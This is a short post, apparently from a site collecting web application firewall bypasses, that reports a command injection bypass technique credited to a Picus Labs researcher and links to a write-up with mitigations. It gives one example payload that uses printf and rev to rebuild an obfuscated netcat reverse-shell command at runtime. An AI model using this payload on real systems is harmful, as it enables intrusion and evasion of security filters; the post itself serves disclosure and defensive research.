WAF bypass by PicusSecurity

Date: October 27, 2020Author: wafbypass

A command injection WAF bypass method discovered by Picus Labs researcher @evrnyalcin.

It uses “”rev”” and “”printf”” commands in command substitution.
Example: $(printf ‘hsab/nib/ e- 4321 1.0.0.721 cn’|rev)

Read the write-up for details and mitigations: https://t.co/5A5Ntf3hvS

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools